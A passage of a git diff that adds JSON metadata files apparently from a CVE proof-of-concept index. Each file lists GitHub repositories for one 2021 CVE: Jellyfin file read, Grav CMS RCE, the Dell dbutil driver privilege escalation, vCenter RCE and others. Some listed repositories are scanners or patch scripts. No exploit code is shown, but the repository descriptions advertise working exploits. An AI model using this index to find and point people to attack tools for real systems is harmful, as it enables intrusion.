"id": 62785738, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62785738?v=4", + "html_url": "https:\/\/github.com\/jiaocoll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jiaocoll\/CVE-2021-21402-Jellyfin", + "description": "CVE-2021-21402-Jellyfin-任意文件读取", + "fork": false, + "created_at": "2021-04-09T08:54:55Z", + "updated_at": "2021-04-10T03:10:17Z", + "pushed_at": "2021-04-10T03:10:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 358308476, + "name": "CVE-2021-21402", + "full_name": "somatrasss\/CVE-2021-21402", + "owner": { + "login": "somatrasss", + "id": 69829610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69829610?v=4", + "html_url": "https:\/\/github.com\/somatrasss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/somatrasss\/CVE-2021-21402", + "description": "本项目涉及到的仅为安全研究和授权情况下使用,其使用人员有责任和义务遵守当地法律条规。", + "fork": false, + "created_at": "2021-04-15T15:32:39Z", + "updated_at": "2024-08-12T20:12:11Z", + "pushed_at": "2021-04-15T15:51:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 358484211, + "name": "CVE-2021-21402", + "full_name": "givemefivw\/CVE-2021-21402", + "owner": { + "login": "givemefivw", + "id": 65514141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65514141?v=4", + "html_url": "https:\/\/github.com\/givemefivw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/givemefivw\/CVE-2021-21402", + "description": "CVE-2021-21402 Jellyfin任意文件读取 Wker脚本,可批量。", + "fork": false, + "created_at": "2021-04-16T05:20:20Z", + "updated_at": "2021-04-16T06:04:51Z", + "pushed_at": "2021-04-16T05:24:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21425.json b/2021/CVE-2021-21425.json new file mode 100644 index 0000000000..0c3b7f1336 --- /dev/null +++ b/2021/CVE-2021-21425.json @@ -0,0 +1,95 @@ +[ + { + "id": 379927795, + "name": "CVE-2021-21425", + "full_name": "CsEnox\/CVE-2021-21425", + "owner": { + "login": "CsEnox", + "id": 60170196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60170196?v=4", + "html_url": "https:\/\/github.com\/CsEnox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CsEnox\/CVE-2021-21425", + "description": "GravCMS Unauthenticated Arbitrary YAML Write\/Update leads to Code Execution (CVE-2021-21425)", + "fork": false, + "created_at": "2021-06-24T13:06:24Z", + "updated_at": "2024-10-20T05:32:39Z", + "pushed_at": "2023-04-18T16:30:34Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 449798666, + "name": "GravCMS_Nmap_Script", + "full_name": "frknktlca\/GravCMS_Nmap_Script", + "owner": { + "login": "frknktlca", + "id": 39772097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39772097?v=4", + "html_url": "https:\/\/github.com\/frknktlca", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/frknktlca\/GravCMS_Nmap_Script", + "description": "It is a nmap script for GravCMS vulnerability (CVE-2021-21425)", + "fork": false, + "created_at": "2022-01-19T17:54:19Z", + "updated_at": "2022-01-19T17:55:58Z", + "pushed_at": "2022-01-19T17:58:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887599149, + "name": "cve-2021-21425", + "full_name": "bluetoothStrawberry\/cve-2021-21425", + "owner": { + "login": "bluetoothStrawberry", + "id": 154050956, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154050956?v=4", + "html_url": "https:\/\/github.com\/bluetoothStrawberry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bluetoothStrawberry\/cve-2021-21425", + "description": "working exploit for the old cve-2021-21425 grav cms 1.7.10 vuln", + "fork": false, + "created_at": "2024-11-13T00:30:59Z", + "updated_at": "2024-11-13T00:39:22Z", + "pushed_at": "2024-11-13T00:39:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21514.json b/2021/CVE-2021-21514.json new file mode 100644 index 0000000000..ce7ab23916 --- /dev/null +++ b/2021/CVE-2021-21514.json @@ -0,0 +1,33 @@ +[ + { + "id": 572725685, + "name": "AFR-in-OMSA", + "full_name": "und3sc0n0c1d0\/AFR-in-OMSA", + "owner": { + "login": "und3sc0n0c1d0", + "id": 32236059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32236059?v=4", + "html_url": "https:\/\/github.com\/und3sc0n0c1d0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/und3sc0n0c1d0\/AFR-in-OMSA", + "description": "Validation of Arbitrary File Read Vulnerabilities in Dell OpenManage Server Administrator (OMSA) - CVE-2016-4004, CVE-2021-21514 and CVE-2020-5377.", + "fork": false, + "created_at": "2022-11-30T22:34:58Z", + "updated_at": "2024-05-21T19:14:18Z", + "pushed_at": "2022-12-01T06:36:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21551.json b/2021/CVE-2021-21551.json new file mode 100644 index 0000000000..a326ff6fdb --- /dev/null +++ b/2021/CVE-2021-21551.json @@ -0,0 +1,304 @@ +[ + { + "id": 367056155, + "name": "CVE-2021-21551", + "full_name": "waldo-irc\/CVE-2021-21551", + "owner": { + "login": "waldo-irc", + "id": 10516272, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10516272?v=4", + "html_url": "https:\/\/github.com\/waldo-irc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/waldo-irc\/CVE-2021-21551", + "description": "Exploit to SYSTEM for CVE-2021-21551", + "fork": false, + "created_at": "2021-05-13T13:23:38Z", + "updated_at": "2024-10-30T11:33:55Z", + "pushed_at": "2021-05-20T20:33:09Z", + "stargazers_count": 237, + "watchers_count": 237, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 237, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 369400184, + "name": "CVE-2021-21551", + "full_name": "ch3rn0byl\/CVE-2021-21551", + "owner": { + "login": "ch3rn0byl", + "id": 13082307, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13082307?v=4", + "html_url": "https:\/\/github.com\/ch3rn0byl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ch3rn0byl\/CVE-2021-21551", + "description": null, + "fork": false, + "created_at": "2021-05-21T03:13:58Z", + "updated_at": "2024-10-05T16:20:40Z", + "pushed_at": "2021-05-21T03:24:25Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 25, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 371617838, + "name": "PS-CVE-2021-21551", + "full_name": "arnaudluti\/PS-CVE-2021-21551", + "owner": { + "login": "arnaudluti", + "id": 41639163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41639163?v=4", + "html_url": "https:\/\/github.com\/arnaudluti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arnaudluti\/PS-CVE-2021-21551", + "description": "Script to patch your domain computers about the CVE-2021-21551. Privesc on machines that have the driver dbutil_2_3.sys, installed by some DELL tools (BIOS updater, SupportAssist...)", + "fork": false, + "created_at": "2021-05-28T07:29:40Z", + "updated_at": "2021-06-20T11:02:49Z", + "pushed_at": "2021-06-20T11:02:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 372182222, + "name": "CVE-2021-21551", + "full_name": "mathisvickie\/CVE-2021-21551", + "owner": { + "login": "mathisvickie", + "id": 60326914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60326914?v=4", + "html_url": "https:\/\/github.com\/mathisvickie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mathisvickie\/CVE-2021-21551", + "description": "arbitrary kernel read\/write in dbutil_2_3.sys, Proof of Concept Local Privilege Escalation to nt authority\/system", + "fork": false, + "created_at": "2021-05-30T10:15:10Z", + "updated_at": "2024-10-21T16:00:11Z", + "pushed_at": "2021-11-16T17:34:11Z", + "stargazers_count": 53, + "watchers_count": 53, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-21551", + "dbutil", + "dell", + "dell-driver", + "driver", + "exploit", + "kernel", + "kernel-driver", + "local-privilege-escalation", + "poc", + "privilege-escalation", + "proof-of-concept", + "windows" + ], + "visibility": "public", + "forks": 11, + "watchers": 53, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 373047111, + "name": "CVE-2021-21551-POC", + "full_name": "mzakocs\/CVE-2021-21551-POC", + "owner": { + "login": "mzakocs", + "id": 48490301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48490301?v=4", + "html_url": "https:\/\/github.com\/mzakocs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mzakocs\/CVE-2021-21551-POC", + "description": "An extended proof-of-concept for the CVE-2021-21551 Dell ‘dbutil_2_3.sys’ Kernel Exploit", + "fork": false, + "created_at": "2021-06-02T05:13:07Z", + "updated_at": "2024-07-08T07:18:07Z", + "pushed_at": "2021-07-20T03:03:30Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 23, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 402614345, + "name": "Dell-Driver-EoP-CVE-2021-21551", + "full_name": "ihack4falafel\/Dell-Driver-EoP-CVE-2021-21551", + "owner": { + "login": "ihack4falafel", + "id": 17316888, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17316888?v=4", + "html_url": "https:\/\/github.com\/ihack4falafel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ihack4falafel\/Dell-Driver-EoP-CVE-2021-21551", + "description": "Dell Driver EoP (CVE-2021-21551)", + "fork": false, + "created_at": "2021-09-03T01:47:03Z", + "updated_at": "2024-08-12T20:16:07Z", + "pushed_at": "2022-02-24T10:13:45Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 32, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 507289591, + "name": "kernel-mii", + "full_name": "tijme\/kernel-mii", + "owner": { + "login": "tijme", + "id": 5873573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5873573?v=4", + "html_url": "https:\/\/github.com\/tijme", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tijme\/kernel-mii", + "description": "Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.", + "fork": false, + "created_at": "2022-06-25T11:13:45Z", + "updated_at": "2024-09-24T08:02:25Z", + "pushed_at": "2023-05-07T18:38:29Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "beacon", + "bof", + "cobalt-strike", + "cve-2021-21551", + "exploit", + "kernel", + "red-teaming" + ], + "visibility": "public", + "forks": 24, + "watchers": 79, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 586124071, + "name": "CVE-2021-21551", + "full_name": "nanabingies\/CVE-2021-21551", + "owner": { + "login": "nanabingies", + "id": 13157335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13157335?v=4", + "html_url": "https:\/\/github.com\/nanabingies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanabingies\/CVE-2021-21551", + "description": "Dell Driver EoP (CVE-2021-21551)", + "fork": false, + "created_at": "2023-01-07T02:42:59Z", + "updated_at": "2024-08-17T11:25:46Z", + "pushed_at": "2023-02-03T22:31:46Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 837371307, + "name": "CVE-2021-21551", + "full_name": "Eap2468\/CVE-2021-21551", + "owner": { + "login": "Eap2468", + "id": 68890963, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68890963?v=4", + "html_url": "https:\/\/github.com\/Eap2468", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eap2468\/CVE-2021-21551", + "description": "Proof of concept exploit for CVE-2021-21551", + "fork": false, + "created_at": "2024-08-02T20:14:27Z", + "updated_at": "2024-08-02T20:23:02Z", + "pushed_at": "2024-08-02T20:22:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21716.json b/2021/CVE-2021-21716.json new file mode 100644 index 0000000000..b53b22b5ed --- /dev/null +++ b/2021/CVE-2021-21716.json @@ -0,0 +1,33 @@ +[ + { + "id": 714215346, + "name": "CVE-2023-21716-EXPLOIT.py", + "full_name": "MojithaR\/CVE-2023-21716-EXPLOIT.py", + "owner": { + "login": "MojithaR", + "id": 127576267, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127576267?v=4", + "html_url": "https:\/\/github.com\/MojithaR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MojithaR\/CVE-2023-21716-EXPLOIT.py", + "description": "This is an exploit file which is used to check CVE-2021-21716 vulnerability", + "fork": false, + "created_at": "2023-11-04T08:49:14Z", + "updated_at": "2024-08-23T04:10:50Z", + "pushed_at": "2023-11-05T12:23:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-2173.json b/2021/CVE-2021-2173.json new file mode 100644 index 0000000000..f0bf477909 --- /dev/null +++ b/2021/CVE-2021-2173.json @@ -0,0 +1,33 @@ +[ + { + "id": 373735692, + "name": "CVE-2021-2173", + "full_name": "emad-almousa\/CVE-2021-2173", + "owner": { + "login": "emad-almousa", + "id": 48997609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48997609?v=4", + "html_url": "https:\/\/github.com\/emad-almousa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emad-almousa\/CVE-2021-2173", + "description": "CVE-2021-2173", + "fork": false, + "created_at": "2021-06-04T05:56:01Z", + "updated_at": "2024-08-12T20:13:36Z", + "pushed_at": "2021-06-04T05:57:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-2175.json b/2021/CVE-2021-2175.json new file mode 100644 index 0000000000..2be99607a5 --- /dev/null +++ b/2021/CVE-2021-2175.json @@ -0,0 +1,35 @@ +[ + { + "id": 454859304, + "name": "CVE-2021-2175", + "full_name": "emad-almousa\/CVE-2021-2175", + "owner": { + "login": "emad-almousa", + "id": 48997609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48997609?v=4", + "html_url": "https:\/\/github.com\/emad-almousa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emad-almousa\/CVE-2021-2175", + "description": "CVE-2021-2175", + "fork": false, + "created_at": "2022-02-02T16:53:35Z", + "updated_at": "2022-02-02T16:56:30Z", + "pushed_at": "2022-02-02T16:54:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-2175" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21809.json b/2021/CVE-2021-21809.json new file mode 100644 index 0000000000..a2c0c681aa --- /dev/null +++ b/2021/CVE-2021-21809.json @@ -0,0 +1,33 @@ +[ + { + "id": 580210985, + "name": "CVE-2021-21809", + "full_name": "anldori\/CVE-2021-21809", + "owner": { + "login": "anldori", + "id": 101538840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101538840?v=4", + "html_url": "https:\/\/github.com\/anldori", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anldori\/CVE-2021-21809", + "description": "CVE-2021-21809 POC", + "fork": false, + "created_at": "2022-12-20T01:44:49Z", + "updated_at": "2023-01-31T22:23:21Z", + "pushed_at": "2022-12-20T07:03:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21972.json b/2021/CVE-2021-21972.json new file mode 100644 index 0000000000..884fe7346a --- /dev/null +++ b/2021/CVE-2021-21972.json @@ -0,0 +1,874 @@ +[ + { + "id": 246641886, + "name": "NSE-scripts", + "full_name": "psc4re\/NSE-scripts", + "owner": { + "login": "psc4re", + "id": 4672886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4672886?v=4", + "html_url": "https:\/\/github.com\/psc4re", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/psc4re\/NSE-scripts", + "description": "NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972, proxyshell, CVE-2021-34473", + "fork": false, + "created_at": "2020-03-11T17:51:29Z", + "updated_at": "2024-11-06T12:30:06Z", + "pushed_at": "2021-08-16T18:16:20Z", + "stargazers_count": 161, + "watchers_count": 161, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-1350", + "cve-2021-21972", + "cve-2021-34473", + "nmap", + "nmap-scan-script", + "nmap-scripts", + "nse-script", + "poc", + "proxyshell", + "scanner", + "sigred", + "smbghost", + "smbv3", + "vcenter", + "vulnerability", + "vulnerability-detection" + ], + "visibility": "public", + "forks": 29, + "watchers": 161, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 341854126, + "name": "CVE-2021-21972-vCenter-6.5-7.0-RCE-POC", + "full_name": "QmF0c3UK\/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC", + "owner": { + "login": "QmF0c3UK", + "id": 29447678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29447678?v=4", + "html_url": "https:\/\/github.com\/QmF0c3UK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/QmF0c3UK\/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC", + "description": null, + "fork": false, + "created_at": "2021-02-24T09:56:21Z", + "updated_at": "2024-09-26T03:41:25Z", + "pushed_at": "2021-03-01T02:10:44Z", + "stargazers_count": 136, + "watchers_count": 136, + "has_discussions": false, + "forks_count": 63, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 63, + "watchers": 136, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 341874677, + "name": "CVE-2021-21972", + "full_name": "NS-Sp4ce\/CVE-2021-21972", + "owner": { + "login": "NS-Sp4ce", + "id": 33349032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33349032?v=4", + "html_url": "https:\/\/github.com\/NS-Sp4ce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NS-Sp4ce\/CVE-2021-21972", + "description": "CVE-2021-21972 Exploit", + "fork": false, + "created_at": "2021-02-24T11:14:58Z", + "updated_at": "2024-11-19T07:55:39Z", + "pushed_at": "2023-06-08T04:01:33Z", + "stargazers_count": 486, + "watchers_count": 486, + "has_discussions": false, + "forks_count": 148, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-21972" + ], + "visibility": "public", + "forks": 148, + "watchers": 486, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 341907086, + "name": "CVE-2021-21972", + "full_name": "yaunsky\/CVE-2021-21972", + "owner": { + "login": "yaunsky", + "id": 48243087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4", + "html_url": "https:\/\/github.com\/yaunsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yaunsky\/CVE-2021-21972", + "description": null, + "fork": false, + "created_at": "2021-02-24T13:19:41Z", + "updated_at": "2023-06-15T22:00:13Z", + "pushed_at": "2021-02-24T13:36:28Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 341963506, + "name": "CVE-2021-21972", + "full_name": "horizon3ai\/CVE-2021-21972", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2021-21972", + "description": "Proof of Concept Exploit for vCenter CVE-2021-21972", + "fork": false, + "created_at": "2021-02-24T16:31:34Z", + "updated_at": "2024-11-11T03:13:39Z", + "pushed_at": "2021-02-25T16:05:02Z", + "stargazers_count": 252, + "watchers_count": 252, + "has_discussions": false, + "forks_count": 87, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 87, + "watchers": 252, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 342109140, + "name": "westone-CVE-2021-21972-scanner", + "full_name": "Osyanina\/westone-CVE-2021-21972-scanner", + "owner": { + "login": "Osyanina", + "id": 78467376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4", + "html_url": "https:\/\/github.com\/Osyanina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2021-21972-scanner", + "description": "A vulnerability scanner that detects CVE-2021-21972 vulnerabilities.", + "fork": false, + "created_at": "2021-02-25T03:19:25Z", + "updated_at": "2021-03-20T07:55:11Z", + "pushed_at": "2021-03-20T07:55:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 342129970, + "name": "CVE-2021-21972", + "full_name": "alt3kx\/CVE-2021-21972", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2021-21972", + "description": null, + "fork": false, + "created_at": "2021-02-25T05:10:06Z", + "updated_at": "2024-08-12T20:10:40Z", + "pushed_at": "2021-02-25T05:49:19Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 54, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 342131182, + "name": "CVE-2021-21972", + "full_name": "milo2012\/CVE-2021-21972", + "owner": { + "login": "milo2012", + "id": 905335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/905335?v=4", + "html_url": "https:\/\/github.com\/milo2012", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/milo2012\/CVE-2021-21972", + "description": "CVE-2021-21972", + "fork": false, + "created_at": "2021-02-25T05:16:38Z", + "updated_at": "2023-05-04T18:23:14Z", + "pushed_at": "2021-03-01T03:38:00Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 32, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 342156654, + "name": "VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972", + "full_name": "conjojo\/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972", + "owner": { + "login": "conjojo", + "id": 79626719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79626719?v=4", + "html_url": "https:\/\/github.com\/conjojo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/conjojo\/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972", + "description": "VMware vCenter 未授权RCE(CVE-2021-21972)", + "fork": false, + "created_at": "2021-02-25T07:17:21Z", + "updated_at": "2024-06-21T00:09:09Z", + "pushed_at": "2021-02-25T09:54:53Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 342190619, + "name": "CVE-2021-21972", + "full_name": "L-pin\/CVE-2021-21972", + "owner": { + "login": "L-pin", + "id": 23657203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23657203?v=4", + "html_url": "https:\/\/github.com\/L-pin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/L-pin\/CVE-2021-21972", + "description": null, + "fork": false, + "created_at": "2021-02-25T09:28:17Z", + "updated_at": "2021-02-26T01:57:28Z", + "pushed_at": "2021-02-26T01:57:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 342203695, + "name": "CVE-2021-21972", + "full_name": "B1anda0\/CVE-2021-21972", + "owner": { + "login": "B1anda0", + "id": 74232513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74232513?v=4", + "html_url": "https:\/\/github.com\/B1anda0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B1anda0\/CVE-2021-21972", + "description": "VMware vCenter Server远程代码执行漏洞 (CVE-2021-21972)批量检测脚本", + "fork": false, + "created_at": "2021-02-25T10:16:20Z", + "updated_at": "2023-11-26T03:08:22Z", + "pushed_at": "2021-02-25T10:26:53Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 342246923, + "name": "CVE-2021-21972", + "full_name": "renini\/CVE-2021-21972", + "owner": { + "login": "renini", + "id": 1587083, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1587083?v=4", + "html_url": "https:\/\/github.com\/renini", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/renini\/CVE-2021-21972", + "description": "CVE-2021-21972", + "fork": false, + "created_at": 